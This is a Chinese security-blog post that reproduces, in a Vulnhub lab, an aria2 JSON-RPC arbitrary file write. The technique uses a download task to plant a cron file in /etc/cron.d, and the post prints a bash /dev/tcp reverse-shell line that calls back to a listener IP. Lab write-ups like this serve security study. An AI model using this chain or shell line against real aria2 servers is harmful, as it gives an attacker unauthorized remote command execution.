aria2任意文件写入漏洞-复现
F_
- 关注
aria2任意文件写入漏洞-复现
Aria2是一个命令行下轻量级、多协议、多来源的下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内建XML-RPC和JSON-RPC接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞。
本文仅作漏洞复现记录与实现,利用流程如下:
1.漏洞环境
url: http://192.168.101.152:6800/
2.利用过程
利用Vulnhub搭建好环境之后,访问目标的6800端口
返回404状态码,确认环境已经开启
6800是aria2的rpc服务的默认端口,rpc服务通信需要json或xml传输,不太方便,可以借用第三方工具
http://binux.github.io/yaaw/demo/
首先点击右上方的小钳子,配置服务器
设置好后点击保存
之后点击add,添加一个下载任务
配置好下载的任务,通过写入一个crond任务来反弹shell
先生成一个反弹文件,将反弹文件放入服务器,开启http服务
#!/bin/bash /bin/bash -i >& /dev/tcp/192.168.1.128/1234 0>&1
设置好下载链接,这里将反弹文件下载到/etc/cron.d/下,文件名为test1,/etc/cron.d目录下的所有文件将被作为计划任务配置文件读取,等待一分钟左右,反弹shell。
本文为 F_ 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
使用AnyDesk静默安装控制主机
2022-06-08
没什么用处的上线方式增加了
2021-05-16
基础免杀-特征码定位
2021-05-06